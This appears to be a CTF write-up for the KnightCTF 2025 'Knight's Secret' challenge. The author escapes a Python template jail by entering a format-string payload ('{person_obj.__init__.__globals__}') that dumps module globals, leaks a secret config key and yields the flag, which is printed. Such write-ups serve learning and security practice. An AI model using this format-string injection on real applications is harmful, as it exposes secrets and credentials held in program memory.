Knight's Secret
by sealldev
🚩 CTFs KnightCTF 2025 pwn
Knight's Secret / KnightCTF 2025

Original Writeup on
Note: This was less of a typical Pwn and was a pyjail.
We connect to the server and see this:
└─$ nc 1337
Welcome to the Knight's Secret!
The castle's vault holds a secret key, protected within the CONFIG dictionary.
You are a knight tasked with proving the strength of the vault's defenses.
To succeed, you must craft an input to reveal the hidden key within the system.
You will be provided with a user object representing a knight, with attributes 'name' and 'role'.
Once you discover the key, input it again to receive the banner of victory.
Example of a safe template: 'Greetings, {}, the {person_obj.role}.'
Type 'hint' if you need guidance or 'exit' to withdraw from the quest.
Enter your secret:
Our aim is to find the CONFIG
We can see entering just the object shows an instance, so we know this is Python:
Enter your secret: {person_obj}
Output: <__main__.Person object at 0x703c0aa16480>
Using the PyJail Cheatsheet I use .__init__.__globals__
to get the CONFIG
Enter your secret: {person_obj.__init__.__globals__}
Output: {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7e23d44d78f0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/challenge/', '__cached__': None, 'CONFIG': {'KEY': '_KNIGHTSECRET2025_'}, 'Person': <class '__main__.Person'>, 'fun': <function fun at 0x7e23d44be340>, 'main': <function main at 0x7e23d429cd60>}
We can then enter the secret for the flag.
Enter your secret: _KNIGHTSECRET2025_
Congratulations, noble knight! You have unveiled the vault's secret.
Here is your banner of victory: KCTF{_c0ngRaT5_Kn1GHT_Y0U_g07_THE_secreT_}
Flag: KCTF{_c0ngRaT5_Kn1GHT_Y0U_g07_THE_secreT_}